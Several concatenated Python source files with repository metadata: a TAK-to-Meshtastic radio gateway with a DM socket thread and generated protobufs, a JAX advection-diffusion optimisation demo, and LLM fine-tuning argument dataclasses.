self.sa_multicast_sock.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_IF, socket.inet_aton(self.ip))
self.sa_multicast_sock.setsockopt(socket.SOL_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(sa_multicast_in[0]) + socket.inet_aton(self.ip))
self.dm_sock.start()
while True:
data = None
try:
inputready, outputready, exceptready = select.select([self.chat_sock, self.sa_multicast_sock], [], [])
for s in inputready:
data, sender = s.recvfrom(4096)
# Only accept multicast data from one TAK client
if sender[0] != self.ip and sender[0] != self.tak_client_ip:
self.logger.warning(f"Got data from {sender[0]}, ignoring")
continue
except KeyboardInterrupt:
self.logger.info("Exiting....")
self.dm_sock.stop()
self.interface.close()
break
if data:
self.logger.debug(data)
parsed_data = takproto.parse_proto(data)
if not parsed_data:
parsed_data = takproto.parse_proto(takproto.xml2proto(data.decode('utf-8')))
if not parsed_data:
self.logger.warning(f"Failed to parse data: {data}")
continue
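                # CoT type 'b-t-f' is a GeoChat message; anything else is treated as a
                # position/PLI update from the local TAK client.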
if parsed_data and parsed_data.cotEvent.type == 'b-t-f':
xml = "<detail>" + parsed_data.cotEvent.detail.xmlDetail + "</detail>"
soup = BeautifulSoup(xml, 'xml')
chat = soup.find("__chat")
chatroom = chat.attrs['chatroom']
sender_callsign = chat.attrs['senderCallsign']
chat_group = chat.find("chatgrp")
sender_uid = chat_group.attrs['uid0']
receiver_uid = chat_group.attrs['uid1']
remarks = soup.find("remarks")
message = remarks.text
if chatroom == "All Chat Rooms":
# Send as a Meshtastic text message so both the Meshtastic app and ATAK Plugin will receive it
self.interface.sendText(message)
self.logger.info("Sent text message to Meshtastic")
else:
tak_packet = atak_pb2.TAKPacket()
tak_packet.is_compressed = True
tak_packet.contact.callsign, size = unishox2.compress(sender_callsign)
tak_packet.contact.device_callsign, size = unishox2.compress(sender_uid)
tak_packet.group.team = self.tak_client['group_name']
tak_packet.group.role = self.tak_client['group_role']
tak_packet.status.battery = self.tak_client['battery']
tak_packet.chat.message, size = unishox2.compress(message)
tak_packet.chat.to = receiver_uid
self.interface.sendData(tak_packet, portNum=portnums_pb2.PortNum.ATAK_PLUGIN)
self.logger.info("Sent ATAK GeoChat to Meshtastic")
elif parsed_data:
uid = parsed_data.cotEvent.uid
if not uid:
continue
if not self.tak_client:
self.tak_client = {'lat': parsed_data.cotEvent.lat, 'lon': parsed_data.cotEvent.lon,
'hae': parsed_data.cotEvent.hae, 'uid': uid,
'ce': parsed_data.cotEvent.ce, 'le': parsed_data.cotEvent.le,
'callsign': '', 'device': '', 'platform': '', 'os': '', 'version': '',
'group_name': '', 'group_role': '',
'course': 0, 'speed': 0, 'battery': 0, 'last_tx_time': 0}
self.logger.debug(self.tak_client)
else:
self.tak_client['lat'] = parsed_data.cotEvent.lat
self.tak_client['lon'] = parsed_data.cotEvent.lon
self.tak_client['hae'] = parsed_data.cotEvent.hae
self.tak_client['ce'] = parsed_data.cotEvent.ce
self.tak_client['le'] = parsed_data.cotEvent.le
if parsed_data.cotEvent.detail.HasField("contact"):
contact = parsed_data.cotEvent.detail.contact
if not self.tak_client['callsign']:
self.tak_client['callsign'] = contact.callsign
self.interface.localNode.setOwner(f"{contact.callsign} Mesh Node", uid[-4:])
if parsed_data.cotEvent.detail.HasField("takv"):
takv = parsed_data.cotEvent.detail.takv
self.tak_client['device'] = takv.device
self.tak_client['platform'] = takv.platform
self.tak_client['os'] = takv.os
self.tak_client['version'] = takv.version
if parsed_data.cotEvent.detail.HasField("group"):
group = parsed_data.cotEvent.detail.group
self.tak_client['group_name'] = group.name
self.tak_client['group_role'] = group.role
if parsed_data.cotEvent.detail.HasField("track"):
self.tak_client['course'] = parsed_data.cotEvent.detail.track.course
self.tak_client['speed'] = parsed_data.cotEvent.detail.track.speed
if parsed_data.cotEvent.detail.HasField("status"):
self.tak_client['battery'] = parsed_data.cotEvent.detail.status.battery
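                    # Rate-limit mesh traffic: only forward our own position if at least
                    # tx_interval seconds have passed since the last transmission.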
if time.time() - self.tak_client['last_tx_time'] >= self.tx_interval:
if self.meshtastic_connected:
# Send as a Meshtastic protobuf to show up in the Meshtastic app
self.logger.info("Sending position to Meshtastic")
self.interface.sendPosition(latitude=parsed_data.cotEvent.lat,
longitude=parsed_data.cotEvent.lon,
altitude=parsed_data.cotEvent.hae)
# Send as a TAKPacket to show up in ATAK
atak_packet = atak_pb2.TAKPacket()
if self.tak_client['group_name']:
atak_packet.group.team = self.tak_client['group_name'].replace(" ", "_")
if self.tak_client['group_role']:
atak_packet.group.role = self.tak_client['group_role'].replace(" ", "")
atak_packet.status.battery = self.tak_client['battery']
pli = atak_pb2.PLI()
pli.latitude_i = int(self.tak_client['lat'] / .0000001)
pli.longitude_i = int(self.tak_client['lon'] / .0000001)
pli.altitude = int(self.tak_client['hae'])
pli.speed = int(self.tak_client['speed'])
pli.course = int(self.tak_client['course'])
atak_packet.pli.CopyFrom(pli)
contact = atak_pb2.Contact()
contact.callsign = self.tak_client['callsign'].encode()
contact.device_callsign = uid.encode()
atak_packet.contact.CopyFrom(contact)
if self.meshtastic_connected:
self.interface.sendData(atak_packet, portNum=portnums_pb2.PortNum.ATAK_PLUGIN)
self.tak_client['last_tx_time'] = time.time()
self.logger.info("Sent ATAK packet to Meshtastic")
self.logger.debug(atak_packet)
else:
self.logger.debug("Not sending packet to Meshtastic")
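# Command-line entry point: validate the supplied addresses and start the gateway loop.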
def main():
parser = argparse.ArgumentParser(
prog='TAK Meshtastic Gateway',
description='Listens for multicast messages from TAK clients and forwards them to a Meshtastic network and vice-versa')
parser.add_argument('-i', '--ip-address', help='Network interface to listen on for multicast messages',
default=None)
parser.add_argument('-s', '--serial-device', help='Serial device of the Meshtastic node', default=None)
parser.add_argument('-m', '--mesh-ip', help='IP address of the Meshtastic node', default=None)
parser.add_argument('-c', '--tak-client-ip', help='IP address of the TAK client', default="localhost")
    parser.add_argument('-t', '--tx-interval', help='Minimum time to wait in seconds before sending PLI to the mesh',
                        type=int, default=30)
parser.add_argument('-l', '--log-file', help='Save log messages to the specified file', default=None)
    parser.add_argument('-p', '--dm-socket-port', help='Port to listen on for DMs', type=int, default=4243)
parser.add_argument('-d', '--debug', help='Enable debug logging', action='store_true')
args = parser.parse_args()
if args.ip_address:
try:
ipaddress.IPv4Address(args.ip_address)
except ipaddress.AddressValueError:
print(f"Invalid IPv4 Address: {args.ip_address}")
sys.exit()
if args.mesh_ip:
try:
ipaddress.IPv4Address(args.mesh_ip)
except ipaddress.AddressValueError:
print(f"Invalid Mesh IPv4 Address: {args.mesh_ip}")
sys.exit()
if args.serial_device and args.mesh_ip:
print("Please specify either --serial-device or --mesh-ip, not both. If neither is specified this program will "
"try to automatically find the correct serial device.")
sys.exit()
tak_meshtastic_gateway = TAKMeshtasticGateway(args.ip_address, args.serial_device, args.mesh_ip, args.tak_client_ip,
args.tx_interval, args.dm_socket_port, args.log_file, args.debug)
tak_meshtastic_gateway.main()
if __name__ == '__main__':
main()
| 32,586 | Python | .py | 528 | 45.399621 | 156 | 0.558023 | brian7704/TAK_Meshtastic_Gateway | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,117 | __init__.py | brian7704_TAK_Meshtastic_Gateway/tak_meshtastic_gateway/__init__.py | # These version placeholders will be replaced later during substitution.
__version__ = "0.0.0-post.14+c0c6411"
__version_tuple__ = (0, 0, 0, "post", 14, "c0c6411")
| 164 | Python | .py | 3 | 53.666667 | 72 | 0.695652 | brian7704/TAK_Meshtastic_Gateway | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,118 | dm_socket_thread.py | brian7704_TAK_Meshtastic_Gateway/tak_meshtastic_gateway/dm_socket_thread.py | import socket
import takproto
from threading import Thread
from bs4 import BeautifulSoup
from meshtastic import portnums_pb2, atak_pb2
class DMSocketThread(Thread):
def __init__(self, logger, meshtastic_interface, port=4243):
super().__init__()
self.meshtastic_interface = meshtastic_interface
self.shutdown = False
self.socket = None
self.port = port
self.logger = logger
self.connection = None
self.connection_address = None
self.meshtastic_nodes = []
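    # Accept one TCP connection at a time from the TAK client, parse the CoT it sends, and
    # forward the GeoChat either as a plain Meshtastic text DM or, for nodes running the ATAK
    # plugin, as an ATAK_PLUGIN TAKPacket.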
def run(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(('0.0.0.0', self.port))
self.socket.listen(1)
self.socket.settimeout(1.0)
while not self.shutdown:
try:
self.connection, self.connection_address = self.socket.accept()
self.logger.info(f"Got a connection from {self.connection_address[0]}")
except KeyboardInterrupt:
break
except TimeoutError:
if self.shutdown:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
continue
except BaseException as e:
self.logger.warning(e)
continue
try:
data = self.connection.recv(4096)
self.logger.debug(data)
self.connection.close()
except (ConnectionError, ConnectionResetError) as e:
self.logger.warning(e)
break
except TimeoutError:
if self.shutdown:
self.logger.warning("Got TimeoutError, exiting...")
break
else:
continue
parsed_data = takproto.parse_proto(data)
if not parsed_data:
parsed_data = takproto.parse_proto(takproto.xml2proto(data.decode('utf-8')))
if not parsed_data:
self.logger.warning(f"Failed to parse data: {data}")
continue
xml = "<details>" + parsed_data.cotEvent.detail.xmlDetail + "</details>"
details = BeautifulSoup(xml, 'xml')
remarks = details.find('remarks')
chat = details.find("__chat")
chatgrp = details.find("chatgrp")
# For some unknown reason, WinTAK can send a GeoChat CoT without a <remarks> tag
if not remarks or not chat or not chatgrp:
continue
self.logger.debug(f"Sending message: {remarks.text} to {chat.attrs['id']}")
# DM to a node with the Meshtastic app
if chat.attrs['id'] in self.meshtastic_nodes:
self.meshtastic_interface.sendText(text=remarks.text, destinationId=chat.attrs['id'])
# DM to a node running the ATAK plugin
else:
tak_packet = atak_pb2.TAKPacket()
tak_packet.contact.callsign = chat.attrs['senderCallsign']
tak_packet.contact.device_callsign = chatgrp.attrs['uid0']
tak_packet.chat.message = remarks.text
tak_packet.chat.to = chat.attrs['id']
self.meshtastic_interface.sendData(tak_packet, portNum=portnums_pb2.PortNum.ATAK_PLUGIN)
self.logger.debug(tak_packet)
def add_meshtastic_node(self, node_id):
if node_id not in self.meshtastic_nodes:
self.logger.debug(f"Adding {node_id}")
self.meshtastic_nodes.append(node_id)
def stop(self):
self.logger.warning("Shutting down")
self.shutdown = True
| 3,758 | Python | .py | 83 | 32.337349 | 104 | 0.583333 | brian7704/TAK_Meshtastic_Gateway | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,119 | atak_pb2.py | brian7704_TAK_Meshtastic_Gateway/tak_meshtastic_gateway/proto/atak_pb2.py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: atak.proto
"""Generated protocol buffer code."""
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\natak.proto\x12\nmeshtastic\"\xe6\x01\n\tTAKPacket\x12\x15\n\ris_compressed\x18\x01 \x01(\x08\x12$\n\x07\x63ontact\x18\x02 \x01(\x0b\x32\x13.meshtastic.Contact\x12 \n\x05group\x18\x03 \x01(\x0b\x32\x11.meshtastic.Group\x12\"\n\x06status\x18\x04 \x01(\x0b\x32\x12.meshtastic.Status\x12\x1e\n\x03pli\x18\x05 \x01(\x0b\x32\x0f.meshtastic.PLIH\x00\x12#\n\x04\x63hat\x18\x06 \x01(\x0b\x32\x13.meshtastic.GeoChatH\x00\x42\x11\n\x0fpayload_variant\"2\n\x07GeoChat\x12\x0f\n\x07message\x18\x01 \x01(\x0c\x12\x0f\n\x02to\x18\x02 \x01(\x0cH\x00\x88\x01\x01\x42\x05\n\x03_to\"M\n\x05Group\x12$\n\x04role\x18\x01 \x01(\x0e\x32\x16.meshtastic.MemberRole\x12\x1e\n\x04team\x18\x02 \x01(\x0e\x32\x10.meshtastic.Team\"\x19\n\x06Status\x12\x0f\n\x07\x62\x61ttery\x18\x01 \x01(\r\"4\n\x07\x43ontact\x12\x10\n\x08\x63\x61llsign\x18\x01 \x01(\x0c\x12\x17\n\x0f\x64\x65vice_callsign\x18\x02 \x01(\x0c\"_\n\x03PLI\x12\x12\n\nlatitude_i\x18\x01 \x01(\x0f\x12\x13\n\x0blongitude_i\x18\x02 \x01(\x0f\x12\x10\n\x08\x61ltitude\x18\x03 \x01(\x05\x12\r\n\x05speed\x18\x04 \x01(\r\x12\x0e\n\x06\x63ourse\x18\x05 \x01(\r*\xc0\x01\n\x04Team\x12\x14\n\x10Unspecifed_Color\x10\x00\x12\t\n\x05White\x10\x01\x12\n\n\x06Yellow\x10\x02\x12\n\n\x06Orange\x10\x03\x12\x0b\n\x07Magenta\x10\x04\x12\x07\n\x03Red\x10\x05\x12\n\n\x06Maroon\x10\x06\x12\n\n\x06Purple\x10\x07\x12\r\n\tDark_Blue\x10\x08\x12\x08\n\x04\x42lue\x10\t\x12\x08\n\x04\x43yan\x10\n\x12\x08\n\x04Teal\x10\x0b\x12\t\n\x05Green\x10\x0c\x12\x0e\n\nDark_Green\x10\r\x12\t\n\x05\x42rown\x10\x0e*\x7f\n\nMemberRole\x12\x0e\n\nUnspecifed\x10\x00\x12\x0e\n\nTeamMember\x10\x01\x12\x0c\n\x08TeamLead\x10\x02\x12\x06\n\x02HQ\x10\x03\x12\n\n\x06Sniper\x10\x04\x12\t\n\x05Medic\x10\x05\x12\x13\n\x0f\x46orwardObserver\x10\x06\x12\x07\n\x03RTO\x10\x07\x12\x06\n\x02K9\x10\x08\x42_\n\x13\x63om.geeksville.meshB\nATAKProtosZ\"github.com/meshtastic/go/generated\xaa\x02\x14Meshtastic.Protobufs\xba\x02\x00\x62\x06proto3')
_TEAM = DESCRIPTOR.enum_types_by_name['Team']
Team = enum_type_wrapper.EnumTypeWrapper(_TEAM)
_MEMBERROLE = DESCRIPTOR.enum_types_by_name['MemberRole']
MemberRole = enum_type_wrapper.EnumTypeWrapper(_MEMBERROLE)
Unspecifed_Color = 0
White = 1
Yellow = 2
Orange = 3
Magenta = 4
Red = 5
Maroon = 6
Purple = 7
Dark_Blue = 8
Blue = 9
Cyan = 10
Teal = 11
Green = 12
Dark_Green = 13
Brown = 14
Unspecifed = 0
TeamMember = 1
TeamLead = 2
HQ = 3
Sniper = 4
Medic = 5
ForwardObserver = 6
RTO = 7
K9 = 8
_TAKPACKET = DESCRIPTOR.message_types_by_name['TAKPacket']
_GEOCHAT = DESCRIPTOR.message_types_by_name['GeoChat']
_GROUP = DESCRIPTOR.message_types_by_name['Group']
_STATUS = DESCRIPTOR.message_types_by_name['Status']
_CONTACT = DESCRIPTOR.message_types_by_name['Contact']
_PLI = DESCRIPTOR.message_types_by_name['PLI']
TAKPacket = _reflection.GeneratedProtocolMessageType('TAKPacket', (_message.Message,), {
'DESCRIPTOR' : _TAKPACKET,
'__module__' : 'atak_pb2'
# @@protoc_insertion_point(class_scope:meshtastic.TAKPacket)
})
_sym_db.RegisterMessage(TAKPacket)
GeoChat = _reflection.GeneratedProtocolMessageType('GeoChat', (_message.Message,), {
'DESCRIPTOR' : _GEOCHAT,
'__module__' : 'atak_pb2'
# @@protoc_insertion_point(class_scope:meshtastic.GeoChat)
})
_sym_db.RegisterMessage(GeoChat)
Group = _reflection.GeneratedProtocolMessageType('Group', (_message.Message,), {
'DESCRIPTOR' : _GROUP,
'__module__' : 'atak_pb2'
# @@protoc_insertion_point(class_scope:meshtastic.Group)
})
_sym_db.RegisterMessage(Group)
Status = _reflection.GeneratedProtocolMessageType('Status', (_message.Message,), {
'DESCRIPTOR' : _STATUS,
'__module__' : 'atak_pb2'
# @@protoc_insertion_point(class_scope:meshtastic.Status)
})
_sym_db.RegisterMessage(Status)
Contact = _reflection.GeneratedProtocolMessageType('Contact', (_message.Message,), {
'DESCRIPTOR' : _CONTACT,
'__module__' : 'atak_pb2'
# @@protoc_insertion_point(class_scope:meshtastic.Contact)
})
_sym_db.RegisterMessage(Contact)
PLI = _reflection.GeneratedProtocolMessageType('PLI', (_message.Message,), {
'DESCRIPTOR' : _PLI,
'__module__' : 'atak_pb2'
# @@protoc_insertion_point(class_scope:meshtastic.PLI)
})
_sym_db.RegisterMessage(PLI)
if _descriptor._USE_C_DESCRIPTORS == False:
DESCRIPTOR._options = None
DESCRIPTOR._serialized_options = b'\n\023com.geeksville.meshB\nATAKProtosZ\"github.com/meshtastic/go/generated\252\002\024Meshtastic.Protobufs\272\002\000'
_TEAM._serialized_start=569
_TEAM._serialized_end=761
_MEMBERROLE._serialized_start=763
_MEMBERROLE._serialized_end=890
_TAKPACKET._serialized_start=27
_TAKPACKET._serialized_end=257
_GEOCHAT._serialized_start=259
_GEOCHAT._serialized_end=309
_GROUP._serialized_start=311
_GROUP._serialized_end=388
_STATUS._serialized_start=390
_STATUS._serialized_end=415
_CONTACT._serialized_start=417
_CONTACT._serialized_end=469
_PLI._serialized_start=471
_PLI._serialized_end=566
# @@protoc_insertion_point(module_scope)
| 5,562 | Python | .py | 103 | 52.038835 | 1,996 | 0.759735 | brian7704/TAK_Meshtastic_Gateway | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,120 | advection_diffusion.py | pmocz_advectiondiffusion-jax/advection_diffusion.py | import numpy as np
from scipy.sparse import csc_matrix
from scipy.sparse.linalg import splu
from scipy.optimize import minimize
import jax
#jax.config.update("jax_enable_x64", True) # turn this on to use double precision JAX
import jax.numpy as jnp
from jax import jit
from jaxopt import ScipyBoundedMinimize
from jax.experimental import sparse
import matplotlib.pyplot as plt
import timeit
"""
Create Your Own Automatically Differentiable Simulation (With Python/JAX)
Philip Mocz (2024), @PMocz
Solve the advection-diffusion equation using a finite difference method
Plug it into an optimization problem to find the wind parameters that maximize pollution at the center of the domain
Use either 'L-BFGS-B' method with finite difference gradient estimates (Numpy/SciPy) or autodiff (JAX) to solve the optimization problem
"""
# Global variables
W = 0.5
diffusivity = 0.05
t_end = 0.25
N = 61
M = 50
dx = 1.0 / (N-1)
dt = t_end / M
t = np.linspace(0, t_end, M+1)
# === Numpy version of the simulation ========================================
def index_function(i, j, N):
# maps index (i,j) to the vector index in our solution vector
# (the grid size is N^2)
return j*N + i
def initial_condition(x, y):
# initial condition for the pollution
return 2.0*np.exp(-100.0*((x-0.25)**2+(y-0.25)**2))+np.exp(-150.0*((x-0.65)**2+(y-0.4)**2))
def build_matrix(theta):
# Construct the matrix (D) and its LU decomposition for the linear system to be solved at each time step
D = np.eye(N**2, N**2)
for i in range(1, N-1):
for j in range(1, N-1):
D[index_function(i,j,N),index_function(i,j,N)] = dt*(1.0/dt + 4.0*diffusivity/dx**2)
D[index_function(i,j,N),index_function(i+1,j,N)] = dt*( W*np.cos(theta)/(2.0*dx) - diffusivity/dx**2)
D[index_function(i,j,N),index_function(i-1,j,N)] = dt*(-W*np.cos(theta)/(2.0*dx) - diffusivity/dx**2)
D[index_function(i,j,N),index_function(i,j+1,N)] = dt*( W*np.sin(theta)/(2.0*dx) - diffusivity/dx**2)
D[index_function(i,j,N),index_function(i,j-1,N)] = dt*(-W*np.sin(theta)/(2.0*dx) - diffusivity/dx**2)
D = csc_matrix(D) # sparse representation of the matrix
B = splu(D) # do an LU decomposition of the matrix
return B
def do_simulation(x):
# Solve the advection-diffusion equation using a finite difference method
# Keep track of the pollution
# Construct initial (t=0) solution
xlin = np.linspace(0.0, 1.0, N)
U = np.zeros(N**2)
for i in range(1, N-1):
for j in range(1, N-1):
U[index_function(i,j,N)] = initial_condition(xlin[i], xlin[j])
# Keep track of pollution as function of time
pollution = np.zeros(M+1)
ctr = index_function(N//2+1,N//2+1,N)
pollution[0] = U[ctr]
# Set the initial wind direction
update_wind_direction = False
i_wind = 0
# Build the initial matrix
B = build_matrix(x[i_wind])
# Solve for the time evolution
for i in range(M):
# update the wind direction every 5 time steps
update_wind_direction = (i>0 and i % 5 == 0)
if(update_wind_direction):
i_wind += 1
B = build_matrix(x[i_wind])
# solve the system
U = B.solve(U)
# record pollution at center of domain
pollution[i+1] = U[ctr]
pollution[M] = U[ctr]
pollution_total = np.trapz(pollution, t)
return U, pollution, pollution_total
def loss(x, info):
# loss function that wraps the simulation
_, _, pollution_total = do_simulation(x)
# display information at each function evaluation
    print('{0:4d} {1: 3.4f} {2: 3.4f} {3: 3.4f} {4: 3.4f} {5: 3.4f} {6: 3.4f} {7: 3.4f} {8: 3.4f} {9: 3.4f} {10: 3.4f} {11: 3.6f}'.format(info['Nfeval'], x[0], x[1], x[2], x[3], x[4], x[5], x[6], x[7], x[8], x[9], pollution_total))
info['Nfeval'] += 1
return -pollution_total
# === JAX version of the simulation ==========================================
@jit
def initial_condition_jax(x, y):
# initial condition for the pollution -- JAX version
return 2.0*jnp.exp(-100.0*((x-0.25)**2+(y-0.25)**2))+jnp.exp(-150.0*((x-0.65)**2+(y-0.4)**2))
@jit
def do_simulation_jax(x):
# Solve the advection-diffusion equation with finite difference -- JAX version
# Keep track of the pollution
# Construct initial (t=0) solution
xlin = jnp.linspace(0.0, 1.0, N)
X, Y = jnp.meshgrid(xlin, xlin)
U = initial_condition_jax(X, Y)
U = U.at[0,:].set(0.0)
U = U.at[-1,:].set(0.0)
U = U.at[:,0].set(0.0)
U = U.at[:,-1].set(0.0)
U = U.flatten()
# Keep track of pollution as function of time
ctr = (N//2+1)*N + N//2+1
pollution = jnp.zeros(M+1)
pollution = pollution.at[0].set(U[ctr])
# Define boundary indices
bndry1 = jnp.arange(N)
bndry2 = (N-1)*N + jnp.arange(N)
bndry3 = jnp.arange(N)*N
bndry4 = jnp.arange(N)*N + N-1
bndry = jnp.concatenate((bndry1, bndry2, bndry3, bndry4))
# Set the initial wind direction
update_wind_direction = False
i_wind = 0
theta = x[i_wind]
# Construct the matrix (D) and its LU decomposition for the linear system to be solved at each time step
main_diag = jnp.ones(N**2) * dt*(1.0/dt + 4.0*diffusivity/dx**2)
off_diag1 = jnp.ones(N**2-1) * dt*( W*jnp.cos(theta)/(2.0*dx) - diffusivity/dx**2)
off_diag2 = jnp.ones(N**2-1) * dt*(-W*jnp.cos(theta)/(2.0*dx) - diffusivity/dx**2)
off_diag3 = jnp.ones(N**2-N) * dt*( W*jnp.sin(theta)/(2.0*dx) - diffusivity/dx**2)
off_diag4 = jnp.ones(N**2-N) * dt*(-W*jnp.sin(theta)/(2.0*dx) - diffusivity/dx**2)
D = jnp.diag(main_diag) + jnp.diag(off_diag1, 1) + jnp.diag(off_diag2, -1) + jnp.diag(off_diag3, N) + jnp.diag(off_diag4, -N)
D = D.at[bndry, :].set(0.0)
D = D.at[bndry, bndry].set(1.0)
D = sparse.BCOO.fromdense(D, nse=5*N*N)
# Note: JAX does not support LU decomposition of sparse matrices, so we use a CG solver (an iterative method) instead
#B = jax.scipy.linalg.lu_factor(D) # do an LU decomposition of the matrix
# Solve for the time evolution
for i in range(M):
# update the wind direction every 5 time steps
update_wind_direction = (i>0 and i % 5 == 0)
if(update_wind_direction):
i_wind += 1
theta = x[i_wind]
off_diag1 = jnp.ones(N**2-1) * dt*( W*jnp.cos(theta)/(2.0*dx) - diffusivity/dx**2)
off_diag2 = jnp.ones(N**2-1) * dt*(-W*jnp.cos(theta)/(2.0*dx) - diffusivity/dx**2)
off_diag3 = jnp.ones(N**2-N) * dt*( W*jnp.sin(theta)/(2.0*dx) - diffusivity/dx**2)
off_diag4 = jnp.ones(N**2-N) * dt*(-W*jnp.sin(theta)/(2.0*dx) - diffusivity/dx**2)
D = jnp.diag(main_diag) + jnp.diag(off_diag1, 1) + jnp.diag(off_diag2, -1) + jnp.diag(off_diag3, N) + jnp.diag(off_diag4, -N)
D = D.at[bndry, :].set(0.0)
D = D.at[bndry, bndry].set(1.0)
D = sparse.BCOO.fromdense(D, nse=5*N*N)
#B = jax.scipy.linalg.lu_factor(D) # do an LU decomposition of the matrix
# solve the system
#U = jax.scipy.linalg.lu_solve(B, U)
U, _ = jax.scipy.sparse.linalg.cg(D, U, x0=U, tol=1e-8)
# record pollution at center of domain
pollution = pollution.at[i+1].set(U[ctr])
pollution = pollution.at[M].set(U[ctr])
t = jnp.linspace(0, t_end, M+1)
pollution_total = jnp.trapezoid(pollution, t)
return U, pollution, pollution_total
@jit
def loss_jax(x):
# loss function that wraps the simulation
_, _, pollution_total = do_simulation_jax(x)
return -pollution_total
# === Main ==================================================================
def main():
# Wind parameters (initial guess)
x0 = [np.pi/2.0] * 10
bounds = [(0.0, np.pi)] * 10
# Optimize the wind parameters to find which values maximize the pollution
print("=== Numpy Approach =======================================================")
start = timeit.default_timer()
sol = minimize(loss, x0, args=({'Nfeval':0},), method='L-BFGS-B', tol=1e-8, bounds=bounds, options={'disp': True} )
print("Optimization process took:", timeit.default_timer() - start, "seconds")
print('Number of iterations:', sol.nit)
print('Optimized wind parameters:', '\033[1m', sol.x, '\033[0m')
# Re-run the simulation with the optimized parameters and print the level of pollution
start = timeit.default_timer()
U, pollution, pollution_total = do_simulation(sol.x)
print("Single simulation eval took:", timeit.default_timer() - start, "seconds")
print('Total pollution:', pollution_total)
# Carry out simulation with the optimized parameters
print("=== JAX Approach =========================================================")
#sim_grad = jax.grad(loss_jax) # compute the gradient of the loss function
start = timeit.default_timer()
jbounds = [[0.0]*10, [np.pi]*10]
optimizer = ScipyBoundedMinimize(fun=loss_jax, method='L-BFGS-B', tol = 1e-8, options={'disp': True})
sol_jax = optimizer.run(init_params=x0, bounds=jbounds)
print("Optimization process took:", timeit.default_timer() - start, "seconds")
print('Number of iterations:', sol_jax.state.iter_num)
print('Optimized wind parameters:', '\033[1m', np.array(sol_jax.params), '\033[0m')
# Re-run the simulation with the optimized parameters and print the level of pollution
start = timeit.default_timer()
U, pollution, pollution_total = do_simulation_jax(sol_jax.params)
print("Single simulation eval took:", timeit.default_timer() - start, "seconds")
print('Total pollution:', pollution_total)
# Plot the pollution as a function of time
fig = plt.figure(figsize=(4,4), dpi=120)
plt.plot(t, pollution, 'b-')
plt.xlabel('Time')
plt.ylabel('Pollution')
plt.xlim(0, t_end)
plt.ylim(0.0, 0.16)
plt.show()
# Plot the solution of the 2D pollution field
fig = plt.figure(figsize=(4,4), dpi=120)
U_plot = np.zeros((N, N))
for i in range(N):
for j in range(N):
U_plot[j, i] = U[index_function(i, j, N)]
plt.imshow(U_plot, cmap='Purples')
plt.clim(0.0, 0.4)
plt.contour(U_plot, levels=10, colors='black', alpha=0.5)
plt.plot(0.5*N, 0.5*N, 'bs', markersize=8)
ax = plt.gca()
ax.invert_yaxis()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
ax.set_aspect('equal')
# Save figure
plt.savefig('simulation.png',dpi=240)
plt.show()
return 0
if __name__== "__main__":
main()
| 10,142 | Python | .py | 223 | 42 | 238 | 0.649461 | pmocz/advectiondiffusion-jax | 8 | 3 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,121 | arguments.py | nju-websoft_DIFT/arguments.py | import os
import json
from typing import List, Optional, Dict, Sequence
from dataclasses import dataclass, field
from transformers import Seq2SeqTrainingArguments
@dataclass
class ModelArguments:
model_class: str = field(
default='KGELlama',
metadata={"help": "LlamaForCausalLM | KGELlama"}
)
model_name_or_path: Optional[str] = field(
default="llama-2-7b-chat-hf",
        metadata={"help": "The directory where the base LLM is saved"}
)
kge_model: Optional[str] = field(
default="CoLE",
metadata={"help": "which pretrained embeddings to use"}
)
embedding_dim: int = field(default=768, metadata={'help': 'embedding dim for kge model'})
@dataclass
class DataArguments:
dataset: str = field(default=None, metadata={"help": "Which dataset to finetune on."})
train_path: str = field(default=None, metadata={"help": "path for train file."})
eval_path: str = field(default=None, metadata={"help": "path for valid file."})
test_path: str = field(default=None, metadata={"help": "path for test file."})
source_max_len: int = field(default=2048, metadata={"help": "Maximum source sequence length."},)
target_max_len: int = field(default=64, metadata={"help": "Maximum target sequence length."},)
@dataclass
class TrainingArguments(Seq2SeqTrainingArguments):
full_finetune: bool = field(default=False, metadata={"help": "Finetune the entire model without adapters."})
    use_quant: bool = field(default=False, metadata={"help": "Whether to quantize the base model during finetuning (see bits and quant_type)."})
double_quant: bool = field(default=True, metadata={"help": "Compress the quantization statistics through double quantization."})
quant_type: str = field(default="nf4",metadata={"help": "Quantization data type to use. Should be one of `fp4` or `nf4`."})
bits: int = field(default=4, metadata={"help": "How many bits to use."})
do_train: bool = field(default=True, metadata={"help": 'To train or not to train, that is the question?'})
    do_eval: bool = field(default=True, metadata={"help": 'Whether to run evaluation during training.'})
output_dir: str = field(default='./output', metadata={"help": 'The output dir for logs and checkpoints'})
num_train_epochs: float = field(default=3.0, metadata={"help": "total epochs"})
per_device_train_batch_size: int = field(default=1, metadata={"help": 'The training batch size per GPU. Increase for better speed.'})
gradient_accumulation_steps: int = field(default=16, metadata={"help": 'How many gradients to accumulate before to perform an optimizer step'})
dataloader_num_workers: int = field(default=8)
    optim: str = field(default='paged_adamw_32bit', metadata={"help": 'The optimizer to be used'})
    learning_rate: float = field(default=0.0002, metadata={"help": 'The learning rate'})
lr_scheduler_type: str = field(default='constant', metadata={"help": 'constant | linear | cosine'})
warmup_ratio: float = field(default=0.03, metadata={"help": 'Fraction of steps to do a warmup for'})
lora_r: int = field(default=64, metadata={"help": "Lora R dimension."})
